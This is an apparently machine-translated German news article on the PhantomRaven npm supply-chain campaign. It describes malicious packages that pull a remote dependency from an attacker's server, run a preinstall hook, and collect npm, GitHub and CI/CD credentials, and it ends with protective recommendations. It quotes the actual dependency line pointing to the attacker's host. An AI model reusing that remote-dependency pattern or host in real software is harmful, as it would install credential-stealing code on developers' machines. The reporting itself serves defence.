Willkommen bei IT-Branchen – Der Kanal für IT-News, Cybersecurity und digitale Trends

Für Unternehmen, Lieferanten und Entscheider der IT-Branche

Digitale Strategie und Insights für Entscheider der IT-Branche

Abonnieren

Bleiben Sie über die wichtigsten Neuigkeiten auf dem Laufenden

Durch Drücken der Schaltfläche „Abonnieren“ bestätigen Sie, dass Sie unsere gelesen haben und damit einverstanden sind. Datenschutzrichtlinie Und Nutzungsbedingungen
Abonnieren
Facebook Twitter Instagram LinkedIn Pinterest
Kontaktieren Sie uns

PhantomRaven-Angriff auf die npm-Lieferkette – 126 bösartige npm-Pakete und versteckte Abhängigkeiten

IT-BranchevonIT-Branche
30. Oktober 2025
PhantomRaven-Angriff auf die npm-Lieferkette – 126 bösartige npm-Pakete und versteckte Abhängigkeiten PhantomRaven-Angriff auf die npm-Lieferkette – 126 bösartige npm-Pakete und versteckte Abhängigkeiten
Die PhantomRaven-Kampagne nutzt versteckte npm-Abhängigkeiten aus, um Schadsoftware zu verbreiten.

Die andauernde PhantomRaven npm-Lieferkettenangriff Es handelt sich um eine ausgeklügelte Malware-Kampagne, die Entwickler weltweit ins Visier nimmt. Seit August 2025 hat sich der Angriff verbreitet. 126 schädliche npm-Pakete die zusammen mehr als heruntergeladen wurden 86.000 Mal. Ziel ist es, npm-Authentifizierungstoken und GitHub-Anmeldedaten zu stehlen. CI/CD-Geheimnisse, während gleichzeitig ausgefeilte Techniken zur Umgehung der Erkennung eingesetzt werden, um die meisten Sicherheitswerkzeuge zu umgehen.

Analyst bei Koi-Sicherheit Die Kampagne wurde im Oktober 2025 identifiziert, als ihr Verhaltensüberwachungssystem Wings verdächtige Netzwerkaktivitäten während der Paketinstallationen meldete. Alle schädlichen Pakete stellten externe Anfragen an dieselbe Domain. enthüllten eine koordinierte und globale Betrieb.

PhantomRaven-Angriff auf die npm-Lieferkette – 126 schädliche npm-Pakete und versteckte Abhängigkeiten | IT-Branche

Wie PhantomRaven einen npm-Lieferkettenangriff ausführt

Die Untersuchung der Koi-Forscher ergab einen klaren Zeitablauf. Die ersten 21 Pakete wurden im August 2025 entdeckt und entfernt. Kurz darauf passten die Angreifer ihre Strategie an und veröffentlichten zwischen September und Oktober weitere 80 Pakete, die gängige Erkennungsmechanismen vollständig umgingen. Die Infrastruktur der Angreifer verdeutlicht den Widerspruch zwischen technologisch hochentwickelter Ausführung und überraschend nachlässiger Betriebssicherheit.

PhantomRaven-Angriff auf die npm-Lieferkette – 126 schädliche npm-Pakete und versteckte Abhängigkeiten | IT-Branche
Werbung

Um den Schadcode zu verbergen, verwendeten die Angreifer eine Technik mit entfernte dynamische Abhängigkeiten. Es ermöglicht die Definition von Abhängigkeiten über HTTP-URLs anstatt über die npm-Registry, zum Beispiel:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
Wenn ein solches Paket installiert wird, lädt npm die externe Abhängigkeit automatisch ohne jegliche Sicherheitsprüfung oder Transparenz herunter.

Das bedeutet, dass der Code, der hochgeladen wird, npmjs.com PhantomRaven kann völlig harmlos aussehen – oft nur ein einfaches “Hallo Welt”-Skript –, während die eigentliche Schadsoftware bei der Installation dynamisch vom Server des Angreifers abgerufen wird. Auf diese Weise umgehen Angreifer mit PhantomRaven sowohl die statische Codeanalyse als auch die Abhängigkeitsprüfung.

Versteckte Abhängigkeiten und automatische Ausführung

Sobald die unsichtbare Abhängigkeit auf dem System des Opfers eintrifft, wird der Schadcode sofort über das Lebenszyklusskript von npm aktiviert. package.jsonDie Datei enthält ein Vorinstallationsskript mit dem Namen “preinstall”: “node index.js”, das automatisch und ohne Wissen des Benutzers ausgeführt wird. Dabei spielt es keine Rolle, wie tief sich das Paket im Abhängigkeitsbaum befindet – jede Installation eines scheinbar legitimen Pakets kann die Ausführung des schädlichen Skripts auslösen.

Der PhantomRaven npm-Lieferkettenangriff Dadurch wird die inhärente Flexibilität von npm ausgenutzt, um Schadcode in Echtzeit einzuschleusen. Da bei jeder Installation die Abhängigkeit erneut vom Server des Angreifers abgerufen wird, kann die Schadsoftware zudem an die Zielumgebung angepasst werden, was den Angriff erheblich erschwert. erkennen und stoppen.

Was die Angreifer sammeln

Nach erfolgreicher Installation sammelt PhantomRaven systematisch E-Mail-Adressen aus Umgebungsvariablen., gitconfigDateien, npmrc-Konfigurationen und Autorenfelder in package.json. Es extrahiert außerdem CI/CD-Zugangsdaten, einschließlich GitHub Actions-Tokens, GitLab CI-Schlüssel, Jenkins-Logins, CircleCI-Token Und npm publish tokens.

Die Schadsoftware erstellt anschließend ein vollständiges Systemprofil: Öffentliche IP-Adressen, Hostnamen, Betriebssysteme, Node.js-Versionen und Netzwerkkonfigurationen werden erfasst, um zwischen Unternehmensnetzwerken und einzelnen Entwicklerrechnern zu unterscheiden. Mithilfe dieser Informationen werden wertvolle Ziele identifiziert, auf die Angreifer besseren Zugriff erlangen oder sich weiter ausbreiten können.

Betriebsnachlässigkeit und Nachverfolgung

Trotz der technischen Leistungsfähigkeit zeigt die Infrastruktur Anzeichen für betriebliche Fahrlässigkeit. Mehrere E-Mail-Konten wurden nacheinander über kostenlose Dienste erstellt – von jpdtester01@hotmail.com Zu jpdtester13@gmail.com – und Benutzername als npmhell Und npmpackagejpd Der Text taucht in mehreren Paketen wieder auf. Diese Inkonsistenz hat es Forschern ermöglicht, die Kampagne einem einzelnen Akteur zuzuordnen, was Hoffnung auf zukünftige Identifizierung und Strafverfolgung weckt.

PhantomRaven-Angriff auf die npm-Lieferkette – 126 schädliche npm-Pakete und versteckte Abhängigkeiten | IT-Branche

Empfohlene Schutzmaßnahmen

  1. Alle Tokens und API-Schlüssel (GitHub, npm, CI/CD), die möglicherweise offengelegt wurden, sollten regelmäßig ausgetauscht werden.
  2. Sicht package.jsonDateien prüfen und alle Abhängigkeiten identifizieren, die auf HTTP-URLs verweisen. Diese blockieren oder entfernen.
  3. Implementieren Sie SBOM-Tools wie z. B. CycloneDX oder SPDX um vollständige Transparenz über Abhängigkeiten und Versionsverlauf zu erhalten.
  4. Beschränken Sie die Token-Berechtigungen, verwenden Sie kurzlebige Geheimnisse und aktivieren Sie die automatische Rotation.
  5. Führen Sie Verhaltensüberwachung in CI/CD-Umgebungen ein, z. B. durch Sandbox-Analyse neuer Pakete vor deren Bereitstellung.
  6. Folgen OWASP-Standard zur Verifizierung von Softwarekomponenten für den sicheren Umgang mit Abhängigkeiten von Drittanbietern.
  7. Erwägen Sie die Verwendung privater npm-Registries und die Validierung von Abhängigkeiten vor der Veröffentlichung, um die Reduzierung zu reduzieren. das Risiko zur Manipulation in offenen Ökosystemen.
PhantomRaven-Angriff auf die npm-Lieferkette – 126 schädliche npm-Pakete und versteckte Abhängigkeiten | IT-Branche

Analyse und Bedeutung für die Branche

Das zunehmende Ausmaß der Angriffe, PhantomRaven npm-Lieferkettenangriff Es zeigt deutlich, wie die Abhängigkeitskette zu einer der größten Schwachstellen von Software geworden ist. Wenn Unternehmen darauf aufbauen Open Source und Tausende Drittanbieterpakete erhöhen das Risiko, dass eine einzige kompromittierte Komponente gravierende Folgen haben kann.

Für IT-Organisationen bedeutet dies, dass Sicherheit nicht mehr nur Netzwerke oder Endbenutzer betrifft, sondern die gesamte Entwicklungskette. Sicheres Code-Management, zuverlässige Abhängigkeiten und die kontinuierliche Analyse der Lieferkette werden zu einer strategischen Frage und nicht mehr zu einem technischen Detail.

Die Kampagne zeigt auch, dass Angreifer begonnen haben, wie Entwickler zu denken: Sie nutzen bestehende Funktionen von Tools wie npm aus, um Schadsoftware auf eine Weise zu verbreiten, die völlig legitim erscheint. Dies erfordert eine Änderung der Vorgehensweise von Unternehmen bei der Überwachung und Verifizierung ihrer Software.

Für schwedische und nordische Unternehmen unterstreicht die Veranstaltung die Bedeutung des Aufbaus von Expertise in Sicherheit der Software-Lieferkette und um internationale Standards einzuhalten. Durch proaktive Kontrolle, Informationsaustausch und Offenheit Durch Kooperationen kann die Branche besser vorbereitet sein auf der nächste große Angriff.

Aktie
Aktie
Pin es
Tweet
Aktie
Aktie
IT-BranchevonIT-Branche
Veröffentlicht

Bleiben Sie über die wichtigsten Neuigkeiten auf dem Laufenden

Durch Drücken der Schaltfläche „Abonnieren“ bestätigen Sie, dass Sie unsere gelesen haben und damit einverstanden sind. Datenschutzrichtlinie Und Nutzungsbedingungen
Convendum-Banner
Werbung

MEHR LESEN